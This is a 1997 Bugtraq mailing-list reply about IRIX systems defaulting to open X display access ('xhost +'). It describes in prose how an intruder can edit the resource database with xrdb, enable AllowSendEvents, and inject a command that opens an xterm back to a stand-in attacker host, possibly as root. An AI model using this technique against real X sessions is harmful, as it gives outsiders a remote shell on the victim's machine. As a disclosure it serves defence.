IRIX stupid xhost + default

Date: Mon, 19 May 1997 10:19:07 -0700
From: Matt Harrigan <matth@CONNECTNET.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Reminder for irix ppl/xevents

> The following has been used, abused, and exploited like mad, however a
> little reminder may not hurt.  In the default setup for irix boxes, xhost
> is set to global access whenever someone logs in on console (or invokes
> xdm).  There may be some good reason for this default behavior, however
> it's often a nuissance in situations where one is around a lot of immature
> ppl just waiting to xdisplay '/usr/bin/X11/endsession -f' to your console.

On a far more unhappy note, ending your session is probably the nicest
thing they could do. If someone has access to your X display, they
also have control of the resource database for your session, which
contains all of the attributes assigned to that session. One of these
attributes (AllowSendEvents), controls the receiving of events from
a process foreign to the current event in question. I.E., when a window
is created, it reads information from RESOURCE_MANAGER and
SCREEN_RESOURCES via xrdb, which contains these attributes (like
AllowSendEvents). Unfortunately, when someone has r/w access to your
display, they have r/w access to the database, and therefore, all
of your attributes. All one needs to do at this point is
manually utilize xrdb retrieve a copy of the database, modify
AllowSendEvents: true, reupload the database, and wait for
a user to launch another xterm (so the new attributes can take
effect). It is then trivial to write an xevent interjection tool,
to send "xterm -display IAMAMEANMANONAMEANHOST:0.0" to the window
based on window id, which can also be easily retrieved from the server.
Obviously, the command will be executed as whatever user the session
belongs to, and im sure quite a few of us log onto the console as root.





Matt Harrigan
CIO, Microcosm Computer Resources
matth@mcr.com
415-333-1062